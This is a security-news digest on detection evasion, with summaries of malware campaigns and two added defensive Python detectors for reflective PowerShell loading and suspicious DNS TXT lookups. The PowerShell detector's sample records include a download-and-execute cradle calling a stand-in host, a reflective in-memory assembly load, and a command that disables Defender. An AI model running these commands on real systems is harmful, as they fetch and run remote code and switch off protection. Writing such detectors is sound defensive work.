Topic: detection evasion

  • Stealthy Fileless Malware Spreads RAT via Legitimate Tools

    A fileless malware campaign uses trusted tools like ScreenConnect and PowerShell to deploy a remote access Trojan, leaving minimal forensic traces and evading detection. The attack loads payloads directly into memory via reflection, employs a .NET launcher to establish persistence and disable sec...

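The item above describes payloads loaded straight into memory through .NET reflection from PowerShell. Because nothing touches disk, the most useful artefact is usually the script block itself (Windows records it as event ID 4104 when script block logging is enabled). The following is an added example, not code from the article or from the campaign's tooling: it scores script-block text for combinations of reflective-loading indicators. The record contents, weights and threshold are constructed for illustration and should be tuned against your own baseline.

```python
"""Score PowerShell script blocks for signs of in-memory (reflective) .NET loading.

Added example, not code from the article. The records below are constructed
stand-ins for the ScriptBlockText field of event ID 4104 entries; weights and
threshold are assumptions to tune against your own environment.
"""
import re

# (weight, pattern, label). PowerShell is case-insensitive, so every pattern is
# compiled with re.IGNORECASE. A single indicator is common in admin scripts;
# the score only crosses THRESHOLD when several cooperate in one block.
INDICATORS = [
    (3, r"\[(?:System\.)?Reflection\.Assembly\]::Load\s*\(", "Assembly.Load from a byte array"),
    (2, r"\[(?:System\.)?Convert\]::FromBase64String\s*\(", "Base64-decoded blob"),
    (2, r"\.GetType\([^)]*\)\.GetMethod\([^)]*\)\.Invoke\(", "reflective method invoke"),
    (2, r"Invoke-Expression|\bIEX\b", "Invoke-Expression"),
    (2, r"System\.Net\.WebClient|Invoke-WebRequest|DownloadString|DownloadData", "remote download"),
    (2, r"Set-MpPreference\s+-Disable", "Defender feature disabled"),
]
COMPILED = [(w, re.compile(p, re.IGNORECASE), label) for w, p, label in INDICATORS]
THRESHOLD = 4  # assumption: at least two cooperating indicators


def score_block(text):
    """Return (score, [matched labels]) for one script block; 0 means nothing matched."""
    score, labels = 0, []
    for weight, rx, label in COMPILED:
        if rx.search(text):
            score += weight
            labels.append(label)
    return score, labels


def scan(records):
    """records: {record_id: script_block_text}.

    Returns [(record_id, score, labels)] for blocks at or above THRESHOLD,
    highest score first.
    """
    hits = []
    for rid, text in records.items():
        score, labels = score_block(text)
        if score >= THRESHOLD:
            hits.append((rid, score, labels))
    return sorted(hits, key=lambda h: -h[1])


# Constructed sample records (not real captured script blocks).
CONSTRUCTED_RECORDS = {
    # decode a blob, load it as an assembly, call into it: nothing written to disk
    "rec-1": "$bytes=[Convert]::FromBase64String($blob); "
             "[System.Reflection.Assembly]::Load($bytes).GetType('Loader.Main')"
             ".GetMethod('Run').Invoke($null, $null)",
    # ordinary administration, should score 0
    "rec-2": "Import-Module ActiveDirectory; Get-ADUser -Filter * | Select-Object Name",
    # classic download-and-execute cradle
    "rec-3": "IEX (New-Object System.Net.WebClient).DownloadString('http://example.invalid/p.ps1')",
    # one indicator on its own stays below the threshold here
    "rec-4": "Set-MpPreference -DisableRealtimeMonitoring $true",
}

if __name__ == "__main__":
    for rid, score, labels in scan(CONSTRUCTED_RECORDS):
        print(f"{rid}: score={score} ({', '.join(labels)})")
```

Run against real data, feed it the ScriptBlockText of 4104 events rather than this dictionary, and expect to add exclusions: deployment tooling and some vendor installers legitimately decode Base64 or call Add-Type, so the value is in the co-occurrence of indicators, not any one pattern.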
  • Malicious npm Packages Target Ethereum Smart Contracts

    A new wave of malicious npm packages uses Ethereum smart contracts to hide command-and-control infrastructure, making detection more difficult. Attackers also created fake GitHub repositories with artificially inflated metrics to appear legitimate and target cryptocurrency developers. This campai...

  • Beyond Email: The New Frontier of Phishing Attacks

    Phishing attacks are increasingly moving beyond email to exploit social media, messaging apps, and malicious ads, challenging traditional email-focused security defenses. These multi-channel attacks use sophisticated obfuscation techniques to evade detection and often target core identity platfor...

  • Google: BrickStorm Malware Stole U.S. Data for a Year

    A sophisticated cyber espionage campaign using BrickStorm malware successfully stole sensitive data from American technology, legal, SaaS, and BPO companies for over a year before being detected. The malware, attributed to China-linked group UNC5221, is a versatile backdoor that operates stealthi...

  • Stealth Malware Campaign Infects Thousands via DNS TXT Abuse

    The Detour Dog malware campaign has infected over 30,000 websites, using DNS TXT records for server-side attacks that remain hidden from most users, selectively targeting specific visitors for redirection or malware downloads. This attack operates by having compromised servers send DNS queries wi...

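The Detour Dog item above is a server-side technique: the compromised web server, not the visitor's browser, issues DNS queries and acts on TXT answers, so the one place the activity is visible to the defender is resolver or DNS-firewall logs. The following is an added example, not code from the article or from the campaign: it reads a constructed resolver log and flags web-tier hosts that send TXT queries to a domain using many distinct, high-entropy leftmost labels, which is what encoding per-request data into query names looks like from the resolver's side. The log format, addresses, domain names, allowlist and thresholds are all assumptions made for illustration.

```python
"""Flag web servers making TXT lookups with many unique, high-entropy subdomains.

Added example, not code from the article. Log format, addresses, domains and
thresholds below are constructed for illustration.
"""
import math
import re
from collections import defaultdict

# Assumption: addresses of the web tier. Derive this from asset inventory in practice.
WEB_SERVERS = {"10.0.1.10", "10.0.1.11"}
# Assumption: domains your web servers legitimately query for TXT (e.g. ACME challenges).
ALLOWLIST = {"corp.example"}
MIN_DISTINCT_LABELS = 3  # distinct leftmost labels per (client, domain) before we care
MIN_ENTROPY_BITS = 3.5   # Shannon entropy in bits/char over those labels

# Constructed key=value log format; adapt the regex to your resolver's format.
LINE_RE = re.compile(r"client=(?P<client>\S+)\s+qtype=(?P<qtype>\S+)\s+qname=(?P<qname>\S+)")


def shannon_entropy(s):
    """Bits per character of the string s (0.0 for an empty string)."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname):
    """Last two labels of a name. Simplification: use a public-suffix list in practice."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def analyse(lines):
    """Return {(client, domain): {"labels": n, "entropy": bits}} for suspicious pairs."""
    seen = defaultdict(set)  # (client, domain) -> set of leftmost labels
    for line in lines:
        m = LINE_RE.search(line)
        if not m or m["qtype"] != "TXT" or m["client"] not in WEB_SERVERS:
            continue
        qname = m["qname"].rstrip(".")
        domain = registered_domain(qname)
        if domain in ALLOWLIST:
            continue
        seen[(m["client"], domain)].add(qname.split(".")[0])

    findings = {}
    for key, labels in seen.items():
        # Entropy over the concatenation of all distinct labels: random-looking
        # identifiers score high, a single fixed label like "_dmarc" scores low.
        ent = shannon_entropy("".join(sorted(labels)))
        if len(labels) >= MIN_DISTINCT_LABELS and ent >= MIN_ENTROPY_BITS:
            findings[key] = {"labels": len(labels), "entropy": round(ent, 2)}
    return findings


# Constructed resolver log (not real traffic).
CONSTRUCTED_LOG = [
    "2024-01-01T00:00:01Z client=10.0.1.10 qtype=TXT qname=k3j9x2m7q1w5z8a4.cmd.example-c2.test",
    "2024-01-01T00:00:02Z client=10.0.1.10 qtype=TXT qname=p6r0t2y9u4i1o3l7.cmd.example-c2.test",
    "2024-01-01T00:00:03Z client=10.0.1.10 qtype=TXT qname=b5n8v3c1d7f2g9h4.cmd.example-c2.test",
    "2024-01-01T00:00:04Z client=10.0.1.10 qtype=A qname=cdn.example.net",
    "2024-01-01T00:00:05Z client=10.0.1.11 qtype=TXT qname=_acme-challenge.corp.example",
    "2024-01-01T00:00:06Z client=10.0.2.20 qtype=TXT qname=_dmarc.example.com",  # not web tier
    "2024-01-01T00:00:07Z client=10.0.1.11 qtype=TXT qname=_dmarc.example.com",
]

if __name__ == "__main__":
    for (client, domain), stats in analyse(CONSTRUCTED_LOG).items():
        print(f"{client} -> {domain}: {stats['labels']} labels, entropy {stats['entropy']} bits")
```

Two caveats a practitioner would apply: web servers that send mail (contact forms) will legitimately look up SPF and DMARC TXT records, which stay well below the entropy threshold but should still be allowlisted by domain to keep the output quiet; and the last-two-labels shortcut in `registered_domain` mis-groups names under multi-label suffixes, so swap in a public-suffix library before relying on the counts.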
  • SonicWall VPN Attacks Intensify, MFA Bypassed

    A ransomware group named Akira is exploiting SonicWall SSL VPN appliances, primarily through a known vulnerability (CVE-2024-40766), to bypass multi-factor authentication and gain unauthorized access. The attacks are highly automated and rapid, with intruders moving quickly to scan networks and d...

  • 'BRICKSTORM' Backdoor: Chinese Hackers Target US Firms

    A sophisticated cyber espionage campaign using the BRICKSTORM backdoor is targeting U.S. companies, particularly in legal, tech, and SaaS sectors, and is attributed to Chinese-aligned hackers with goals beyond intelligence gathering. The threat actors, known as UNC5221, employ a complex, multi-st...
